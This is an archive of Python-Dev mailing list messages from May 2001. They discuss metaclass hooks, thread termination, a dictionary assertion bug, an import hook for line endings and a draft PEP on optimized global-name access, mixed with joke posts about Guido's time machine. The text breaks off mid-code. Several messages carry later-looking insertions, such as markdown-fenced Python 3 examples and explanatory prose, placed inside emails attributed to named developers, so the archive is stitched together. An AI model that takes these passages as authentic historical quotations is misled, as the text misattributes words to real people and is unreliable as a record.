def MagicObject(name, bases, dict):
    import types, new
    l = []
    for b in bases:
        if type(b) == types.FunctionType:
            # we will see our MetaMixin function here,
            # but this cannot be used in bases
            continue
        if type(b) == types.InstanceType:
            # a base created by MagicObject is an instance;
            # inherit from its underlying class instead
            l.append(b.__class__)
        else:
            l.append(b)
    bases = tuple(l)

    # define a new class
    Class = new.classobj(name, bases, dict)

    # create an instance of this class
    # without calling its __init__ method
    class_instance = new.instance(Class, {})

    # new protocol for initializing: call __init_class__ if defined
    try:
        init_class = class_instance.__init_class__
    except AttributeError:
        pass
    else:
        init_class()

    # build the class used for real instances from the
    # _instance_ class defined in the class body
    Instance = new.classobj("%s_Instance" % name,
                            Class._instance_.__bases__,
                            Class._instance_.__dict__)

    Instance.__dict__['__meta__'] = class_instance
    Class._instance_ = Instance

    return class_instance

def MetaMixin():
    pass
MetaMixin.__class__ = MagicObject

<--- end code --->


Comments?

Thomas


From guido@digicool.com  Wed May 23 19:02:06 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 14:02:06 -0400
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200."
 <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>
 <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>
Message-ID: <200105231802.f4NI26408784@odiug.digicool.com>

> [this message has also been posted to comp.lang.python]
[And I'm cc'ing there]

> Guido's metaclass hook in Python goes this way:
> 
> If a base class (let's better call it a 'base object')
> has a __class__ attribute, this is called to create the
> new class.
> 
> From demo/metaclasses/index.html:
> 
> class C(B):
>     a = 1
>     b = 2
> 
> Assuming B has a __class__ attribute, this translates into:
> 
> C = B.__class__('C', (B,), {'a': 1, 'b': 2})

Yes.

> Usually B is an instance of a normal class.

No, B should behave like a class, which makes it an instance of a
metaclass.

> So the above code will create an instance of B,
> call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2},
> and assign the instance of B to the variable C.

No, it will not create an instance of B.  It will create an instance
of B.__class__, and that new object (C) is a subclass of B.  The difference between
subclassing and instantiation is confusing, but crucial, when talking
about metaclasses!  See the ASCII art in my classic post to the
types-sig:
http://mail.python.org/pipermail/types-sig/1998-November/000084.html
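The instance-versus-subclass distinction can be checked directly with Python 3 classes. This is a sketch assuming Python 3; Meta, B, C and D are hypothetical names.

The class statement and the explicit metaclass call both produce objects that are instances of the metaclass and subclasses of B, but not instances of B. The class statement also sets up things like `__qualname__`, so the two spellings are only roughly equivalent.

```python
class Meta(type):
    """A metaclass: its instances are classes."""

B = Meta("B", (), {})

# The class statement below...
class C(B):
    a = 1
    b = 2

# ...is roughly this explicit call; note that type(B) is Meta, not B.
D = type(B)("D", (B,), {"a": 1, "b": 2})

for cls in (C, D):
    # instance of Meta?  subclass of B?  instance of B?
    print(cls.__name__, isinstance(cls, Meta), issubclass(cls, B), isinstance(cls, B))
```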

> I've ever since played with this metaclass hook, and
> always found the problem that B would have to completely
> simulate the normal python behaviour for classes (modifying
> of course what you want to change).
> 
> The problem is that there are a lot of successful and
> unsuccessful attribute lookups, which require a lot
> of overhead when implemented in Python: So the result
> is very slow (too slow to be usable in some cases).

Yes.  You should be able to subclass an existing metaclass!
Fortunately, in the descr-branch code in CVS, this is possible.  I
haven't explored it much yet, but it should be possible to do things
like:

Integer = type(0)
Class = Integer.__class__   # same as type(Integer)

class MyClass(Class):
    ...

MyObject = MyClass("MyObject", (), {})

myInstance = MyObject()

Here MyClass declares a metaclass, and MyObject is a regular class
that uses MyClass for its metaclass.  Then, myInstance is an instance
of MyObject.

See the end of PEP 252 for info on getting the descr-branch code
(http://python.sourceforge.net/peps/pep-0252.html).
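Subclassable metaclasses also bear on the class-method question that started this thread. A method defined on the metaclass can be called on MyObject itself. It is not found through MyObject's instances, because instance attribute lookup searches only the class and its bases.

This is a sketch assuming Python 3 syntax; the whoami method is a hypothetical example.

```python
class MyClass(type):
    """Metaclass; methods defined here act like class methods of its classes."""
    def whoami(cls):
        return "class method of " + cls.__name__

MyObject = MyClass("MyObject", (), {})
myInstance = MyObject()

print(MyObject.whoami())
print(hasattr(myInstance, "whoami"))  # instances don't see metaclass methods
```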

> ------
> 
> Python 2.1 allows attaching attributes to function objects,
> so a new metaclass pattern can be implemented.
> 
> The idea is to let B be a function having a __class__ attribute
> (which does _not_ have to be a class, it can again be a function).

Oh, yuck.  I suppose this is fine if you want to experiment with
metaclasses in 2.1, but please consider using the descr-branch code
instead so you can see what 2.2 will be like!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May 23 19:40:58 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 23 May 2001 20:40:58 +0200
Subject: [Python-Dev] Daily Python URL on your Palm
Message-ID: <3B0C043A.D5C9C604@lemburg.com>

Just thought you might want to know that Fredrik's Daily Python
URL can be downloaded onto the Palm as Avantgo Channel.

Here's the URL for adding the channel:
http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00

PS: Would be nice if Fredrik could provide a "printable" version
of the Daily URL page, since the table layout doesn't work too
well on the small Palm display.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller@ion-tof.com  Wed May 23 19:57:28 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 20:57:28 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>              <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>  <200105231802.f4NI26408784@odiug.digicool.com>
Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook>

Let me try again (and please forgive my
mistakes in the detail).
The usual way (as in demo\metaclasses):

class B_Meta:
    ....

B = B_Meta('B', (), {})

class C(B):
    pass

B is an instance of the (meta)class B_Meta.
C is now another instance of the same (meta)class,
because B.__class__, which is the (meta)class itself,
is called and returns a new instance.
B_Meta can (and must) implement a lot of behaviour.

In contrast, with my recipe:

def MagicFunction(name, bases, dict):
    ...construct a class on the fly...
    ...create an instance of this class...
    return an_instance_of_a_class

def B(): pass
B.__class__ = MagicFunction

class C(B):
    pass

Now C is an_instance_of_a_class (which is an instance
of a normal python class), and thus does inherit the
normal behaviour of Python classes.
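The hook this recipe relies on (the class statement calling a base's `__class__`) does not exist in Python 3. The following sketch therefore passes MagicFunction through the `metaclass=` keyword instead; that is an assumption about how one might port the idea, not Thomas's code. The class statement still calls MagicFunction(name, bases, dict), and C ends up as an instance of an ordinary class built on the fly, so normal method binding works without extra effort. The `hello` method is hypothetical.

```python
def MagicFunction(name, bases, namespace):
    # Construct an ordinary class on the fly from the class body ...
    cls = type(name, bases, dict(namespace))
    # ... and hand back an instance of it instead of the class itself.
    return cls()


class C(metaclass=MagicFunction):
    def hello(self):
        # Ordinary instance-method binding applies, since C is an instance.
        return 'hello from an instance of ' + type(self).__name__


print(C.hello())   # hello from an instance of C
```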

Thomas

PS: I'm sure this all will be much better in descr-branch.
I've checked it out and am playing with it from time
to time, but most of the time I have to use released
Python versions.


From tim.one@home.com  Wed May 23 20:32:59 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 15:32:59 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523160025.B690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>

[Thomas Wouters]
>
> As those of you on python-checkins might have noticed ;) I started
> checking in Python 2.1.1 bugfixes.

And bless you for it, Thomas!

> I'd hoped to finish all of my backlog today, but unfortunately I'm
> now called away on a surprise emergency meeting,

Now that sucks.  Tell your manager that you'll only attend planned emergency
meetings from now on:  Guido plans Python crises years in advance, and it
shows in the relative cleanliness of the Python codebase <wink>.


From nas@python.ca  Wed May 23 20:41:14 2001
From: nas@python.ca (Neil Schemenauer)
Date: Wed, 23 May 2001 12:41:14 -0700
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
Message-ID: <20010523124114.A4747@glacier.fnational.com>

Tim Peters wrote:
> Guido plans Python crises years in advance, and it shows in the
> relative cleanliness of the Python codebase <wink>.

I don't think Thomas has a time machine.

  Neil


From tim.one@home.com  Wed May 23 20:45:06 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 15:45:06 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com>

[Aahz]
> Okay, so we all know it isn't possible to kill threads cleanly and
> safely in any kind of cross-platform way.  At the same time, a program
> that has a thread running haywire should be able to kill itself
> completely, so that a monitoring process can restart it.  How hard would
> it be to do only that in a cross-platform way?

Since Python is written in C, and C says nothing about this, you need a
platform expert for each platform covered by "cross" <wink>.

> I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
> clue what would need to happen for Windows and Mac.
>
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

Please open a bug report on that, then, with a tiny test case if possible.
This worked fine on Win98SE for me just now:

import thread, os, time

def task():
    while 1:
        print "x",
        time.sleep(.1)

for i in range(10):
    thread.start_new_thread(task, ())

time.sleep(5)
os._exit(1)

Windows kills all threads spawned by a process when "the main thread" exits.
You don't need to do os._exit(), and sys.exit() is normally a much better
idea (else, e.g., stdio buffers may not get flushed to disk).
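The point about unflushed buffers can be seen in a small Python 3 sketch (an illustration, not code from the thread, and it involves no threads). A child interpreter writes to a piped stdout, which is therefore block-buffered, and then exits via either sys.exit() or os._exit(). The helper name run_child is hypothetical. PYTHONUNBUFFERED is removed from the child's environment so that buffering is not disabled.

```python
import os
import subprocess
import sys


def run_child(exit_statement):
    """Run a child interpreter that writes 'x' to stdout and then executes
    exit_statement; return the bytes that reached the parent."""
    code = "import os, sys\nsys.stdout.write('x')\n" + exit_statement
    env = dict(os.environ)
    env.pop("PYTHONUNBUFFERED", None)   # keep the child's stdout buffered
    result = subprocess.run([sys.executable, "-c", code],
                            stdout=subprocess.PIPE, env=env)
    return result.stdout


print(run_child("sys.exit(0)"))   # b'x': buffers are flushed on the way out
print(run_child("os._exit(0)"))   # b'': the buffered 'x' is lost
```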


From thomas@xs4all.net  Wed May 23 21:27:51 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 22:27:51 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com>
Message-ID: <20010523222751.G690@xs4all.nl>

On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote:
> Tim Peters wrote:
> > Guido plans Python crises years in advance, and it shows in the
> > relative cleanliness of the Python codebase <wink>.
> 
> I don't think Thomas has a time machine.

*Don't* get me started on that. If only Guido would stop hogging the damned
thing, I could be a 34-year-old millionaire in a 10-room house and 8
girlfriends !

Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly
y'rs,
-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one@home.com  Wed May 23 21:32:04 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 16:32:04 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

You wouldn't happen to have a reproducible test case?  That hash==8 is almost
certainly a red herring -- or a sign of wild stores <wink>.

> Going back to revision 2.90 fixes the problem (or masks it).

Instead of:

	assert(mp->ma_fill < mp->ma_size);

this code used to be:

	if (mp->ma_fill >= mp->ma_size) {
		/* No room for a new key.
		 * This only happens when the dict is empty.
		 * Let dictresize() create a minimal dict.
		 */
		assert(mp->ma_used == 0);
		if (dictresize(mp, 0) != 0)
			return -1;
		assert(mp->ma_fill < mp->ma_size);
	}

so the dict would get resized whenever ma_fill >= ma_size, although the code
only *expected* that to happen when the dict table was NULL.  It was perhaps
happening in other cases too.  The dict is never empty (NULL) after the
patch, so the special case for "empty" got replaced by an assert.

Offhand I don't see how this could be triggering -- although *something*
about the 2.90 logic makes me uneasy!  Ah, mp->ma_fill >= mp->ma_size wasn't
a correct test:  filled slots that aren't used slots don't stop a new key
from being added.  Assuming that's it, 2.90 could do needless calls to
dictresize, but the new version does a bogus assert instead.  So replace the
current version's offending

	assert(mp->ma_fill < mp->ma_size);

with

	assert(mp->ma_used < mp->ma_size);

Let me know whether that solves it.

2.90 may also suffer a bogus

		assert(mp->ma_used == 0);

failure.  It's not easy to provoke any of this, though (requires exactly the
right sequence of mixed inserts and deletes, with hash codes hitting exactly
the right dict slots).
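A toy model makes the fill/used distinction concrete. It is not CPython's dictobject.c, whose probe sequence and resize policy differ. Deleting a key leaves a dummy marker that still counts toward fill, and a later insert may reuse a dummy without raising fill. The sequence here is five inserts and five deletes, followed by inserts of keys 5 through 8 into an 8-slot table. At the end, fill equals the table size while used is only 4, so an assert on fill < size fires even though a new key could still be added. ToyTable and its methods are hypothetical names.

```python
DUMMY = object()   # marker left in a slot by a deletion


class ToyTable:
    """Toy open-addressing table with linear probing; fixed size, no
    resizing.  fill counts active + dummy slots, used counts active only."""

    def __init__(self, size=8):
        self.slots = [None] * size   # None: slot never used
        self.fill = 0
        self.used = 0

    def _probe(self, key):
        # Visit every slot once, starting at hash(key) modulo the size.
        # (Unlike CPython, the toy bounds the probe by the table size.)
        size = len(self.slots)
        start = hash(key) % size
        for k in range(size):
            yield (start + k) % size

    def insert(self, key):
        free = None    # first dummy slot seen, reusable for a new key
        empty = None   # first never-used slot, which ends the probe
        for i in self._probe(key):
            slot = self.slots[i]
            if slot is None:
                empty = i
                break
            if slot is DUMMY:
                if free is None:
                    free = i
            elif slot == key:
                return                    # key already present
        if free is not None:
            self.slots[free] = key        # reusing a dummy: fill unchanged
        elif empty is not None:
            self.slots[empty] = key       # claiming a fresh slot: fill grows
            self.fill += 1
        else:
            raise RuntimeError("no room for a new key")
        self.used += 1

    def delete(self, key):
        for i in self._probe(key):
            slot = self.slots[i]
            if slot is None:
                break
            if slot is not DUMMY and slot == key:
                self.slots[i] = DUMMY     # fill stays the same, used drops
                self.used -= 1
                return
        raise KeyError(key)


t = ToyTable(8)
for i in range(5):
    t.insert(i)
for i in range(5):
    t.delete(i)
print(t.fill, t.used)   # 5 0
for i in range(5, 9):
    t.insert(i)
print(t.fill, t.used)   # 8 4: fill == size, yet key 8 was still added
```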


From barry@digicool.com  Wed May 23 21:52:22 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 16:52:22 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
 <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
 <20010523124114.A4747@glacier.fnational.com>
 <20010523222751.G690@xs4all.nl>
Message-ID: <15116.8966.324136.897953@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas@xs4all.net> writes:

    TW> *Don't* get me started on that. If only Guido would stop
    TW> hogging the damned thing, I could be a 34-year-old millionaire
    TW> in a 10-room house and 8 girlfriends !

It's really not as easy as all that, though.  When Guido's not around,
I've been known to, er, take The Machine for a spin (sshh!  Do /not/
tell him!).  The first time I did, I didn't realize that the blue
toggle had to be in the down position, and when I stepped out,
everybody was speaking Esperanto, had half their heads shaved, and
were toting around what looked like a cross between a dog and a beach
ball (it drooled incessantly).

Fortunately, The Machine has a reset button (oddly labeled "History
Erase Button" and guarded by a candy-crazed TV announcer-like
automaton who must be coaxed from the button with a marshmallow
s'more).

The second time I used it, I'd forgotten that you must keep your left
hand on the silver sphere while you line up the parallel lines with
the lip-actuated alpha wheel.  Silly me, I'd removed my left hand just
before alignment in order to twist the fluoroscopic reflection tube a
quarter rotation out of phase (rule of thumb: never listen to that
automaton when he's licked the last of the chocolate-y goo from his
fingers.  He'll say anything to get another s'more.)

You really don't want to know what that particular world looked like,
but let's just say it involved lots and lots of angry elephants.

So now I leave well enough alone, and I've learned that if you really
want to change the past, just wait for Guido to use it for his own
nefarious purposes, and tape a sign to his back requesting the (very
modest) change to the continuum that you're looking for.

And don't forget to smear the front of that sign with s'more.

-Barry


From tim.one@home.com  Wed May 23 22:02:17 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 17:02:17 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGECAKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

[Tim]
> You wouldn't happen to have a reproducible test case?

Nevermind; I do:

d = {}
for i in range(5):
    d[i] = i
for i in range(5):
    del d[i]
for i in range(5, 9):  # assert triggers when i == 8
    d[i] = i

The cure is more complicated than I described, though.


From esr@thyrsus.com  Wed May 23 23:39:49 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 18:39:49 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523183949.A19251@thyrsus.com>

Barry A. Warsaw <barry@digicool.com>:
> You really don't want to know what that particular world looked like,
> but let's just say it involved lots and lots of angry elephants.

You've been *there*?  Dang...that's the timeline that scared me into
hanging up my lab coat.  It was a slow Saturday and I was hatching
Sinister Plan For World Domination number 4.

What happened to the other three?  Well...I had been planning to
terrorize the western U.S. with a giant mechanical spider, until some
guys from Hollywood offered me way too much money for it.  The trained
army of radioactive gorillas I spent the movie money on didn't work
out -- my Igor flatly refused to shovel any more radioactive gorilla
poop, and you know how hard it is to get good help these days.
Blackmailing major cities with a Zeppelin-mounted death ray projector
sounded cool but Radio Shack was out of the parts.

OK, so plan #4 was to create voracious mega-amoebas using my Ionic
Mutatron and send them out to destroy all my enemies, especially that
kid who beat me up in third grade.  There I was, cackling insanely,
just about to unleash these slimy horrors on an unsuspecting world to
wreak havoc and destruction, when the eka-rhodium electrodes on the
Mutatron arced over.  This produced a wild spike of temporokinetic
energy, and guess where *I* was standing?  Silly me.

Before you could say "plot complication" I was materializing in the
Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself,
as it turned out, who was getting wound up to try out his newest
human-goad on a mahout they had just captured from the Fortified
Cities.  The mahout was terrified out of his wits, and you would have
been too if you'd seen what the High Pachyderm's tusks were covered
with and the lascivious way his trunk was curled around that cheese
grater.  Euggghhh...

It was crazy.  The High Pachyderm was trumpeting like mad, tuskers
charging at me from all directions, and me with at least 5.23 seconds
to go until the temporokinetic charge wore off.  Fortunately I
remembered that elephants communicate using modulated infrasonics that
they hear with the flat part of their foreheads, and I had my trusty
sonic screwdriver on me.  I set it to "infra" at maximum volume and
hurled it at the High Pachyderm -- hit the bugger right in the tiara.
He went berserk and his confused guards started crashing into each
other left and right, which was a pretty impressive sight since the
smallest of them weighed over two and a half tons.
 
It was touch and go there, let me tell you.  I caught one glimpse of
the mahout's rapidly-retreating heels just as the charge wore off and
I was slingshotted back to my lab.  My sonic screwdriver, of course,
followed within seconds -- horribly crushed and mangled.

And that's when I swore off building fiendish devices.  Electrocution
I can laugh at, having my monstrous creations turn on me is all in a
day's work, and that one time I was accidentally transformed into a
fly I found some truly remarkable uses for a three-foot-long
prehensile tongue.  But what the High Pachyderm had planned was too
twisted even for *me*.

I decided Sinister Plan #5 would have to be a bit less hardware-intensive,
if only as a rest for my frazzled nerves.  So I spent the last juice in
the batteries on the orbital mind-control lasers (long story) to implant
some subtle suggestions in a few minds at Netscape and IBM and elsewhere,
and started hitting the conference circuit pretty heavy.

What suggestions?  Oh, nothing important.  Nothing at all...BWAHAHAHAHA!!!
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes the law defends plunder and participates in it. Sometimes
the law places the whole apparatus of judges, police, prisons and
gendarmes at the service of the plunderers, and treats the victim --
when he defends himself -- as a criminal.
	-- Frederic Bastiat, "The Law"


From gward@python.net  Thu May 24 00:48:10 2001
From: gward@python.net (Greg Ward)
Date: Wed, 23 May 2001 19:48:10 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523194810.A9947@gerg.ca>

On 23 May 2001, Barry A. Warsaw said:
> The second time I used it, I'd forgotten that you must keep your left
> hand on the silver sphere while you line up the parallel lines with
> the lip-actuated alpha wheel.

What?  You mean Guido's time machine was really designed by Larry Wall?
Oh, the irony...

        Greg
-- 
Greg Ward - Python bigot                                gward@python.net
http://starship.python.net/~gward/
If you can read this, thank a programmer.


From dgoodger@bigfoot.com  Thu May 24 02:04:46 2001
From: dgoodger@bigfoot.com (David Goodger)
Date: Wed, 23 May 2001 21:04:46 -0400
Subject: [Python-Dev] Re: Import hook to do end-of-line conversion?
In-Reply-To: <3B0AF45D.732126E6@home.net>
Message-ID: <B731D420.11CB9%dgoodger@bigfoot.com>

Yesterday I found I had need for an end-of-line conversion import hook. I
looked around but found none (did I miss some code on this thread?), so I
whipped one up (below). It seems to do the job. If you see any goofs, gaffes
or gotchas, or if you know of a better way to do this, please let me know. I
will post this code to c.l.py in a few days for the enjoyment of all.

-- 
David Goodger    dgoodger@bigfoot.com    Open-source projects:
 - The Go Tools Project: http://gotools.sourceforge.net
 - reStructuredText: http://structuredtext.sourceforge.net (soon!)

-----%<----------cut----------%<----------%<----------cut----------%<-----

# Import hook for end-of-line conversion,
# by David Goodger (dgoodger@bigfoot.com).

# Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to
# import Python modules with any of Unix, Mac, or Windows line endings.

import ihooks, imp, py_compile

class MyHooks(ihooks.Hooks):

    def load_source(self, name, filename, file=None):
        """Compile source files with any line ending."""
        if file:
            file.close()
        py_compile.compile(filename)    # line ending conversion is in here
        cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb')
        try:
            return self.load_compiled(name, filename, cfile)
        finally:
            cfile.close()

class MyModuleLoader(ihooks.ModuleLoader):

    def load_module(self, name, stuff):
        """Special-case package directory imports."""
        file, filename, (suff, mode, type) = stuff
        path = None
        if type == imp.PKG_DIRECTORY:
            stuff = self.find_module_in_dir("__init__", filename, 0)
            file = stuff[0]             # package/__init__.py
            path = [filename]
        try:                            # let superclass handle the rest
            module = ihooks.ModuleLoader.load_module(self, name, stuff)
        finally:
            if file:
                file.close()
        if path:
            module.__path__ = path      # necessary for pkg.module imports
        return module

ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install()


From jeremy@alum.mit.edu  Thu May 24 02:10:55 2001
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: Wed, 23 May 2001 21:10:55 -0400 (EDT)
Subject: [Python-Dev] pre-PEP on optimized global names
Message-ID: <200105240110.VAA09078@newman.concentric.net>

I've been hoping to work on optimized global and builtin name support
for Python 2.2.  I'm not sure if I'll have time, but thought I'd
circulate a draft with some notes on the subject now.  Anyone
interested in this work?

Jeremy

PEP: ???
Title: Optimized Access to Module and Builtin Names
Author: jeremy@digicool.com (Jeremy Hylton)
Status: Draft
Type: Standards Track
Python-Version: 2.2
Created: 23-May-2001

Abstract

    This PEP proposes a new implementation of global module namespaces
    and the builtin namespace that speeds name resolution.  The
    implementation would use an array of object pointers for most
    operations in these namespaces.  The compiler would assign indices
    for global variables at compile time.

    The current implementation represents these namespaces as
    dictionaries.  A global name incurs a dictionary lookup each time
    it is used; a builtin name incurs two dictionary lookups, a failed
    lookup in the global namespace and a second lookup in the builtin
    namespace. 

    This implementation should speed Python code that uses
    module-level functions and variables.  It should also eliminate
    awkward coding styles that have evolved to speed access to these
    names.

    The implementation is complicated because the global and builtin
    namespaces can be modified dynamically in ways that are impossible
    for the compiler to detect.  (Example: A module's namespace is
    modified by a script after the module is imported.)  As a result,
    the implementation must maintain several auxiliary data structures
    to preserve these dynamic features.

Introduction

    [expand on the basic ideas in the abstract]

    [describe the key parts of the design: dlict, compiler support,
    stupid name trick workarounds, optimization of other modules'
    globals] 

DLict design

    The namespaces are implemented using a data structure that has
    sometimes gone under the name dlict.  It is a dictionary that has
    numbered slots for some dictionary entries.  The type must be
    implemented in C to achieve acceptable performance.  A Python
    implementation is included here to explain the basic design:

"""A dictionary-list hybrid"""

import types

class DLict:
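    def __init__(self, names):
        # names maps each global name known at compile time to its slot
        assert isinstance(names, types.DictType)
        self.names = names
        size = len(names)
        self.list = [None] * size   # slot values
        self.empty = [1] * size     # 1 = slot unbound, None = bound
        self.dict = {}              # names not known at compile time
        self.size = 0               # number of bound slots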

    def __getitem__(self, name):
        i = self.names.get(name)
        if i is None:
            return self.dict[name]
        if self.empty[i] is not None:
            raise KeyError, name
        return self.list[i]

    def __setitem__(self, name, val):
        i = self.names.get(name)
        if i is None:
            self.dict[name] = val
        else:
            if self.empty[i] is not None:
                self.size += 1      # count a slot only when it becomes bound
            self.empty[i] = None
            self.list[i] = val

    def __delitem__(self, name):
        i = self.names.get(name)
        if i is None:
            del self.dict[name]
        else:
            if self.empty[i] is not None:
                raise KeyError, name
            self.empty[i] = 1
            self.list[i] = None
            self.size -= 1

    def _bound(self):
        """(name, index) pairs for the numbered slots that hold a value"""
        return [(name, i) for name, i in self.names.items()
                if self.empty[i] is None]

    def keys(self):
        return [name for name, i in self._bound()] + self.dict.keys()

    def values(self):
        return [self.list[i] for name, i in self._bound()] + \
               self.dict.values()

    def items(self):
        return [(name, self.list[i]) for name, i in self._bound()] + \
               self.dict.items()

    def __len__(self):
        return self.size + len(self.dict)

    def __cmp__(self, dlict):
        c = cmp(self.names, dlict.names)
        if c != 0:
            return c
        c = cmp(self.size, dlict.size)
        if c != 0:
            return c
        for i in range(len(self.names)):
            c = cmp(self.empty[i], dlict.empty[i])
            if c != 0:
                return c
            if self.empty[i] is None:
                c = cmp(self.list[i], dlict.list[i])
                if c != 0:
                    return c
        return cmp(self.dict, dlict.dict)
    
    def clear(self):
        self.dict.clear()
        for i in range(len(self.names)):
            if self.empty[i] is None:
                self.empty[i] = 1
                self.list[i] = None
        self.size = 0

    def update(self, other):
        for key, val in other.items():
            self[key] = val

    def load(self, index):
        """dlict-special method to support indexed access"""
        if self.empty[index] is None:
            return self.list[index]
        else:
            raise KeyError, index # XXX might want reverse mapping

    def store(self, index, val):
        """dlict-special method to support indexed access"""
        if self.empty[index] is not None:
            self.size += 1
        self.empty[index] = None
        self.list[index] = val

    def delete(self, index):
        """dlict-special method to support indexed access"""
        if self.empty[index] is not None:
            raise KeyError, index
        self.empty[index] = 1
        self.list[index] = None
        self.size -= 1


Compiler issues

    The compiler currently collects the names of all global variables
    in a module.  These are names bound at the module level or bound
    in a class or function body that declares them to be global.

    The compiler would assign indices for each global name and add the
    names and indices of the globals to the module's code object.
    Each code object would then be bound irrevocably to the module it
    was defined in.  (Not sure if there are some subtle problems with
    this.)
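    As a rough illustration of the index assignment, the following
    sketch uses Python 3's ast module. It is not the compiler the PEP
    describes. It collects names bound at module level (without
    entering function, class, lambda or comprehension scopes) plus
    names declared global anywhere, and numbers them. The function
    name assign_global_indices is hypothetical, only the common binding
    forms are covered, and the sorted index order is an arbitrary
    choice.

```python
import ast


def assign_global_indices(source):
    """Map each global name in `source` to a slot index (sketch only)."""
    tree = ast.parse(source)
    names = set()

    # 1. Names bound at module level, without entering nested scopes.
    todo = list(tree.body)
    while todo:
        node = todo.pop()
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef,
                             ast.ClassDef)):
            names.add(node.name)      # def/class binds its own name here,
            continue                  # but its body is a nested scope
        if isinstance(node, (ast.Lambda, ast.ListComp, ast.SetComp,
                             ast.DictComp, ast.GeneratorExp)):
            continue                  # lambda/comprehension scopes
        if isinstance(node, ast.Name) and isinstance(node.ctx,
                                                     (ast.Store, ast.Del)):
            names.add(node.id)
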